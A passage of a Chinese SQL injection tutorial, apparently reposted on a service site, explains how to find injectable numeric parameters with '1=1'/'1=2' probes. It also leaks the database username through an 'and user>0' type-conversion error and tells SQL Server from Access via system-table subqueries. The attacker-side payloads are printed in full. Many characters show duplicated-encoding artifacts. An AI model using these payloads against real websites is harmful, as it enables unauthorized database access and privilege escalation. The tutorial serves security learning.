其次，部分對(duì)SQL注入有一點(diǎn)了解的程序員，認(rèn)為只要把單引號(hào)過濾掉就安全了，這種情況不為少數(shù)，如果你用單引號(hào)測(cè)試，是測(cè)不到注入點(diǎn)的

那么，什么樣的測(cè)試方法才是比較準(zhǔn)確呢？答案如下：

① 19/showdetail?id=49

② 19/showdetail?id=49 and 1=1

③ 19/showdetail?id=49 and 1=2

這就是經(jīng)典的1=1、1=2測(cè)試法了，怎么判斷呢？看看上面三個(gè)網(wǎng)址返回的結(jié)果就知道了：

可以注入的表現(xiàn)：

① 正常顯示（這是必然的，不然就是程序有錯(cuò)誤了）

② 正常顯示，內(nèi)容基本與①相同

③ 提示BOF或EOF（程序沒做任何判斷時(shí)）、或提示找不到記錄（判斷了rs.eof時(shí)）、或顯示內(nèi)容為空（程序加了on error resume next）

不可以注入就比較容易判斷了，①同樣正常顯示，②和③一般都會(huì)有程序定義的錯(cuò)誤提示，或提示類型轉(zhuǎn)換時(shí)出錯(cuò)。

當(dāng)然，這只是傳入?yún)?shù)是數(shù)字型的時(shí)候用的判斷方法，實(shí)際應(yīng)用的時(shí)候會(huì)有字符型和搜索型參數(shù)，我將在中級(jí)篇的“SQL注入一般步驟”再做分析。

第三節(jié)、判斷數(shù)據(jù)庫類型及注入方法

怎么讓程序告訴你它使用的什么數(shù)據(jù)庫呢？來看看：

SQLServer有一些系統(tǒng)變量，如果服務(wù)器IIS提示沒關(guān)閉，并且SQLServer返回錯(cuò)誤提示的話，那可以直接從出錯(cuò)信息獲取，方法如下：

19/showdetail?id=49 and user>0

這句語句很簡單，但卻包含了SQLServer特有注入方法的精髓，我自己也是在一次無意的測(cè)試中發(fā)現(xiàn)這種效率極高的猜解方法。讓我看來看看它的含義：首先，前面的語句是正常的，重點(diǎn)在and user>0，我們知道，user是SQLServer的一個(gè)內(nèi)置變量，它的值是當(dāng)前連接的用戶名，類型為nvarchar。拿一個(gè)nvarchar的值跟int的數(shù)0比較，系統(tǒng)會(huì)先試圖將nvarchar的值轉(zhuǎn)成int型，當(dāng)然，轉(zhuǎn)的過程中肯定會(huì)出錯(cuò)，SQLServer的出錯(cuò)提示是：將nvarchar值 ”abc” 轉(zhuǎn)換數(shù)據(jù)類型為 int 的列時(shí)發(fā)生語法錯(cuò)誤，呵呵，abc正是變量user的值，這樣，不廢吹灰之力就拿到了數(shù)據(jù)庫的用戶名。在以后的篇幅里，大家會(huì)看到很多用這種方法的語句。

順便說幾句，眾所周知，SQLServer的用戶sa是個(gè)等同Adminstrators權(quán)限的角色，拿到了sa權(quán)限，幾乎肯定可以拿到主機(jī)的Administrator了。上面的方法可以很方便的測(cè)試出是否是用sa登錄，要注意的是：如果是sa登錄，提示是將”dbo”轉(zhuǎn)換成int的列發(fā)生錯(cuò)誤，而不是”sa”。

如果服務(wù)器IIS不允許返回錯(cuò)誤提示，那怎么判斷數(shù)據(jù)庫類型呢？我們可以從Access和SQLServer和區(qū)別入手，Access和SQLServer都有自己的系統(tǒng)表，比如存放數(shù)據(jù)庫中所有對(duì)象的表，Access是在系統(tǒng)表[msysobjects]中，但在Web環(huán)境下讀該表會(huì)提示“沒有權(quán)限”，SQLServer是在表[sysobjects]中，在Web環(huán)境下可正常讀取。

在確認(rèn)可以注入的情況下，使用下面的語句：

19/showdetail?id=49 and (select count(*) from sysobjects)>0

19/showdetail?id=49 and (select count(*) from msysobjects)>0

如果數(shù)據(jù)庫是SQLServer，那么第一個(gè)網(wǎng)址的頁面與原頁面19/showdetail?id=49是大致相同的；而第二個(gè)網(wǎng)址，由于找不到表msysobjects，會(huì)提示出錯(cuò)，就算程序有容錯(cuò)處理，頁面也與原頁面完全不同。

以上就是關(guān)于sql注入有哪幾種方式相關(guān)問題的回答。希望能幫到你，如有更多相關(guān)問題，您也可以聯(lián)系我們的客服進(jìn)行咨詢，客服也會(huì)為您講解更多精彩的知識(shí)和內(nèi)容。